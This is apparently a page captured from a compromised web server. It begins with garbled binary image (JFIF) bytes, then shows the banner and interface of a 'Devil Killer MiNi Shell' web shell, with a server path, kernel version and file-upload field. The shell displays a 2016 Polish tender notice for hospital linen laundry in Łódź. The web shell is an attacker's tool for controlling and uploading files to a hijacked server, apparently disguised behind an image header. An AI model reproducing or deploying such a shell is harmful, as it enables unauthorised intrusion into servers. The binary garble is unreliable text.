JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160603/68169-N-2016.html

<p class="kh_header"><b>Łódź: Kompleksowa usługa prania, dzierżawy i dystrybucji bielizny szpitalnej  oraz pozostałego asortymentu dla Spec. Psych. ZOZ w Łodzi</b><br>
<b>Numer ogłoszenia: 68169 - 2016; data zamieszczenia: 03.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej , ul. Aleksandrowska 159, 91-229 Łódź, woj. łódzkie, tel. 042 6529639, faks 042 6528620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psychiatria-lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa prania, dzierżawy i dystrybucji bielizny szpitalnej  oraz pozostałego asortymentu dla Spec. Psych. ZOZ w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa usługa dzierżawy , prania i dystrybucji bielizny szpitalnej oraz pozostałego asortymentu zgodnie z zapotrzebowaniem Spec. Psych ZOZ w Łodzi realizowana poprzez : a. odbiór i pranie brudnej pościeli szpitalnej i innego asortymentu będącego własnością Zamawiającego z poszczególnych komórek organizacyjnych Zamawiającego b. odbiór i pranie brudnego innego asortymentu będącego własnością pacjentów Zamawiającego z poszczególnych komórek organizacyjnych Zamawiającego c. odbiór i pranie brudnej pościeli szpitalnej dzierżawionej od Wykonawcy z poszczególnych komórek organizacyjnych Zamawiającego d. dzierżawę 600 nowych kompletów bielizny szpitalnej koloru białego. Na komplet składa się : poszwa o wymiarach 160x200 cm; poszewka o wymiarach 80x80cm;prześcieradło z gumką na materace szpitalne o wymiarach 90x200x15cm e. dostawę czystej , wypranej bielizny i innego asortymentu wymienionego w punktach a, b, c i d do poszczególnych komórek organizacyjnych Zamawiającego Szczegółowy opis przedmiotu zamówienia zawarty jest w Rozdziale III-OPIS PRZEDMIOTU ZAMÓWIENIA SIWZ oraz w projekcie umowy stanowiącym załącznik nr 3 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 6 000,00 PLN. Wadium należy wnieść przed upływem terminu składania ofert w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Wadium w innej formie niż w pieniądzu należy wnieść do Zamawiającego zgodnie z miejscem składania ofert -złożone wraz z ofertą lub załączone do oferty. Wadium wnoszone w pieniądzu Wykonawcy wpłacają przelewem na rachunek bankowy Pekao S.A. 82 1240 1545 1111 0010 5042 3197 z dopiskiem : Wadium do postępowania ZPIZ-PN-U-06-06-16 .Lliczy się data wpływu na w.w konto- potwierdzenie wpłaty wadium , stanowi zawartość oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczególnych warunków. Na potwierdzenie warunku Wykonawca winien złożyć Oświadczenie w trybie Art. 22 ust. 1 pkt. 1 - 4 ustawy - Załącznik Nr 5 do SIWZ. W przypadku złożenia oferty wspólnej wymagane jest złożenie dokumentu podpisanego wspólnie przez Wykonawców lub pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania niniejszego zamówienia jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje minimum 2 usługi prania bielizny szpitalnej na rzecz podmiotów, o których mowa w art. 4 ust. 1 pkt. 2, 3 ustawy o działalności leczniczej z dnia 15.04.2011 r. - o wartości każdego z tych zamówień nie mniejszej niż 200.000,00 (dwieście tysięcy złotych) PLN brutto. W przypadku usług rozpoczętych i w trakcie należy wpisać kwotę faktycznie zrealizowaną wskazanej usługi na dzień otwarcia ofert wraz z przedłożeniem dowodów, że usługi zostały wykonane lub są wykonywane należycie. Przez usługę odpowiadającą swym charakterem przedmiotowi zamówienia rozumie się usługę polegającą na świadczeniu usługi prania, dezynfekcji i dzierżawy pościeli w szpitalach , trwającą nie krócej niż 6 miesięcy.Na potwierdzenie warunku Wykonawca winien złożyć Wykaz usług - Załącznik Nr 6 do SIWZ wraz z dowodami potwierdzającymi, że usługa została wykonana lub jest wykonywana należycie. W przypadku oferty wspólnej warunek nie jest oceniany łącznie. Przynajmniej jeden z oferentów składających wspólną -konsorcjum ofertę musi spełniać wymagany warunek .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W zakresie dysponowania potencjałem technicznym, Zamawiający wymaga by środki transportu, których Wykonawca będzie używał w ramach realizacji niniejszego zamówienia - posiadały odrębną, podzieloną skrzynię załadunkową na część czystą i brudną co uniemożliwia stykanie się asortymentu czystego z asortymentem brudnym, przy zachowaniu bariery sanitarnej lub też w przypadku środków transportu, które nie posiadają przedzielonych skrzyni załadunkowych - wymagane jest by Wykonawca realizował usługę odpowiednią ilością środków transportu, które będą użytkowane wyłącznie, rozdzielnie do przewozu bielizny czystej i przewozu bielizny brudnej. W przypadku realizacji zamówienia odrębnymi środkami transportu -które nie posiadają przedzielonych skrzyni załadunkowych Zamawiający wymaga minimum 2 samochody które będą użytkowane wyłącznie, rozdzielnie do przewozu bielizny czystej i przewozu bielizny brudnej. Na potwierdzenie warunku Wykonawca winien złożyć Oświadczenie w trybie Art. 22 ust. 1 pkt. 1 - 4 ustawy - Załącznik Nr 5 do SIWZ oraz Oświadczenie Wykonawcy-Załącznik Nr 9.3 do SIWZ.W przypadku złożenia oferty wspólnej wymagane jest złożenie dokumentu podpisanego wspólnie przez Wykonawców lub pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczególnych warunków. Na potwierdzenie warunku Wykonawca winien złożyć Oświadczenie w trybie Art. 22 ust. 1 pkt. 1 - 4 ustawy - Załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna , iż Wykonawca spełnia warunek w zakresie zdolności finansowej i ekonomicznej jeżeli oświadczy, że posiada Polisę OC obejmującą odpowiedzialność cywilną: kontraktową i deliktową oraz zobowiąże się do posiadania przez cały okres trwania umowy ważnej polisy ubezpieczenia OC, z tytułu prowadzonej działalności gospodarczej o sumie gwarancyjnej nie niższej niż 300 000,00 PLN na jedno i wszystkie zdarzenia w ciągu jednego okresu ubezpieczenia. Na potwierdzenie warunku Wykonawca winien złożyć Oświadczenie Wykonawcy w trybie Art. 22 ust. 1 pkt. 1 - 4 ustawy - Załącznik Nr 5 do SIWZ.W przypadku oferty wspólnej warunek nie jest oceniany łącznie. Przynajmniej jeden z oferentów składających wspólną -konsorcjum ofertę musi spełniać wymagany warunek .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Protokół z kontroli sanitarnej, niestwierdzający nieprawidłowości z okresu nie więcej niż 6 miesięcy przed terminem składania ofert 2. Oświadczenie Wykonawcy, że pralnia i transport Wykonawcy znajduje się pod stałym nadzorem sanitarnym, organizacja prania stosowana w pralni Wykonawcy jest zgodna z ustawą z dnia 05.12.2008 r. o zapobieganiu i zwalczaniu chorób zakaźnych u ludzi t.j. Dz.U. z 2013r., poz. 947 z późn. zm., a pralnia posiada wdrożony Planu higieny pralni - Załączniki nr 9.3 do SIWZ 3. Oświadczenie Wykonawcy, iż posiada pozytywne wyniki z badań z procesu prania i dezynfekcji bielizny pościelowej , ubrań i fartuchów , piżamy ręczniki, ubrania robocze, koce, poduszki, itp. oraz że zastosowane w usłudze i użyte do realizacji przedmiotowego zamówienia środki piorąco -dezynfekcyjne skutecznie działają na B, F, V, Tbc., S, a Wykonawca posiada na nie posiada certyfikaty CE - Załącznik nr 9.2. do SIWZ 4. Oświadczenie Wykonawcy, że w ciągu ostatnich dwóch lat przed terminem składania ofert wykonano minimum: - 2 wymazy czystościowe wykonane z pościeli po cyklu prania , - 2 wymazy czystościowe wykonane z materacy po dezynfekcji komorowej w pralni Wykonawcy, - 2 wymazy z powierzchni ładunkowej samochodu przeznaczonego do transportu bielizny szpitalnej, - 2 wymazy z rąk pracowników, - 2 wymazy z maszyny szwalniczej, - 2 wymazy z magla, - 2 wymazy z regałów na których jest przechowywana czysta bielizna które zostały potwierdzone przez właściwą stację sanitarno-epidemiologiczną i nie wykazały one nieprawidłowości - Załącznik nr 9.1 do SIWZ 5. Oświadczenia Wykonawcy , iż posiada aktualną i ważna na dzień terminu upływu składania ofert pozytywną opinię sanitarną wydaną przez Państwowego Powiatowego Inspektora Sanitarnego dotyczącą środków transportu dostępnych Wykonawcy i przeznaczonych do realizacji usługi, a w przypadku odrębnych środków transportu które nie posiadają przedzielonych skrzyni załadunkowych dla co najmniej 2-óch samochodów. Opinia sanitarna powinna wskazywać czy środki transportu znajdują się pod nadzorem właściwego Państwowego Powiatowego Inspektora Sanitarnego, oraz stan środków transportu odpowiada warunkom sanitarno -higienicznym- Załącznik nr 9.3. do SIWZ 6. Oświadczenia Wykonawcy, iż posiada ważną polisę , a w przypadku jej braku, inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmującej wykonywanie usługi będącej przedmiotem zamówienia, obejmujący odpowiedzialność z tytułu niewykonania lub nienależytego wykonania umowy -odpowiedzialność kontraktowa oraz z tytułu czynu niedozwolonego -odpowiedzialność deliktowa na sumę gwarancyjną nie niższej niż 300 000,00 PLN oraz ,że posiada stosowne środki finansowe na realizację zamówienia w trakcie trwania umowy.Załącznik nr 5 do SIWZ 7. Wykonawca polegający na potencjale podmiotu trzeciego, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Jeżeli podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcyprzedstawienia w odniesieniu do tych podmiotów dokumentów- w zakresie zgodnym z wymaganiami wobec WYKONAWCY. Podmiot który zobowiązał się do udostępnienia zasobów zgodnie z 26 ust. 2b ustawy pzp, odpowiada solidarnie z Wykonawca za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. W przypadku Wykonawców, którzy będą polegać na zasobie wiedzy i doświadczeniu z art. 26 2b Ustawy Pzp w Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji ww. zasobów na potrzeby realizacji przedmiotowego zamówienia. Z przedłożonego dokumentu z musi w sposób wyraźny i jednoznaczny wynikać zobowiązanie -wola podmiotu trzeciego udzielenia wykonawcy, ubiegającemu się o zamówienie zasobu oraz wskazywać zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobu innego podmiotu, przez wykonawcę przy wykonywaniu zamówienia,charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem oraz zakres i okres udziału podmiotu trzeciego przy wykonywaniu przedmiotowego zamówienia. 8. Jeżeli podpisy na ofercie i załącznikach nie wynikają z aktualnego odpisu z właściwego rejestru,wymagane jest załączenie dokumentu w oryginale lub kopii poświadczonej notarialnie- uprawniającego do złożenia podpisu w imieniu Wykonawcy ubiegającego się o udzielenie zamówienia publicznego-pełnomocnictwo/upoważnienie. 9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku należy załączyć do oferty stosowne pełnomocnictwo- w oryginale lub kopii poświadczonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80.00</li>
<li>2 - Certyfikat ISO 13485 w zakresie co najmniej usługi dezynfekcji, prania, renowacji bielizny dla jedn. służby zdrowia wraz z transportem i monitorow - 10.00</li>
<li>3 - Certyfikat Systemu Kontroli Skażenia Biologicznego PN EN 14065 co najmniej w zakresie prania dezynfekcji, transportu bielizny i odzieży dla jedn. - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki dotyczące realizacji zamówienia publicznego określa wzór umowy, stanowiący Załącznik nr 3 do SIWZ. Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach: a.zmiany terminu realizacji zamówienia w przypadku niewykorzystania ilości w okresie trwania umowy, b.zmiany terminu, sposobu lub godziny odbioru lub dostawy bielizny, c.zmiany zapisów umowy w przypadku zmiany przez Zamawiającego założeń w zakresie postępowania z bielizną szpitalną w placówce np. na skutek wprowadzenia procedur postępowanie z bielizną szpitalną d. zmiany zakresu obowiązków Wykonawcy poprzez ich dostosowanie do bieżących potrzeb Zamawiającego, e. zmiany struktury organizacyjnej Spec. Psych. ZOZ polegającej w szczególności na połączenia komórek organizacyjnych/ oddziałów f. zmiany organizacyjnej Spec. Psych. ZOZ istotnej dla realizacji niniejszej umowy, g. zmiany formy prawnej prowadzonej działalności gospodarczej, h. zmiany adresu siedziby firmy i zmiany adresu zamieszkania właściciela lub współwłaściciela firmy, i. zmiany obowiązującego prawa dotyczącego działalności Spec. Psych. ZOZ j. zmiany cen w szczególnie uzasadnionych przypadkach, niezależnych od stron umowy, w wyniku okoliczności których nie można było przewidzieć w chwili zawarcia umowy, za zgodą Zamawiającego wyrażoną w drodze pisemnego aneksu pod rygorem nieważności i jedynie w sytuacji gdy zmiana ta będzie korzystna dla Zamawiającego. k. zmiany umowy w przypadku ustawowej zmiany stawki podatku VAT. l. zmiany minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę- Dz. U. Nr 200, poz. 1679, z późn.zm. ł. zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - w zakresie lit l i ł- jeżeli Wykonawca, w terminie 30 dni od dnia wejścia przepisów wprowadzających te zmiany złoży pisemny wniosek do Zamawiającego (wniosek na piśmie pod rygorem nieważności), w którym to wniosku Wykonawca wykaże (dokumentami i dowodami, a nie tylko oświadczeniem) bezpośredni wpływ tych zmian na koszty wykonania przedmiotu umowy, a Zamawiający uzna ten wniosek za zasadny. Brak przedłożenia dowodów i dokumentów żądanych przez Zamawiającego w trakcie rozpoznawania wniosku Wykonawcy - obciążać będą Wykonawcę, w ten sposób, iż Zamawiający nie będzie miał możliwości weryfikacji wniosku Wykonawcy - co skutkować będzie brakiem możliwości uwzględnienia wniosku. Zmiany cen mogą być dokonane wyłącznie w wyniku negocjacji Stron opartych o w/w dowody. Zmiany - wszystkie zamiany wyłącznie za zgodą Zamawiającego wyrażoną w drodze pisemnego aneksu pod rygorem nieważności i jedynie w sytuacji gdy zmiana ta będzie korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.babinski.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spec. Psych. ZOZ w Łodzi, 91-229 Łódź, ul. Aleksandrowska 159, Dział zamówień publicznych i zaopatrzenia budynek adm. A Ipiętro pok. 12 w godz: 7:30 - 15:05..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2016 godzina 10:00, miejsce: Spec. Psych. ZOZ w Łodzi, 91-229 Łódź,ul. Aleksandrowska 159,Sekretariat Dyrekcji ,budynek adm. A II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY..</p>
